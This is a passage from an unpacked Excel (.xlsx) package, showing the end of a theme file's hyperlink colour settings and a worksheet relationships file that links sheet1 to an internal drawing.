        <a:srgbClr val="1155CC"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="1155CC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</a:theme>
</file>

<file path=xl/worksheets/_rels/sheet1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/></Relationships>
</file>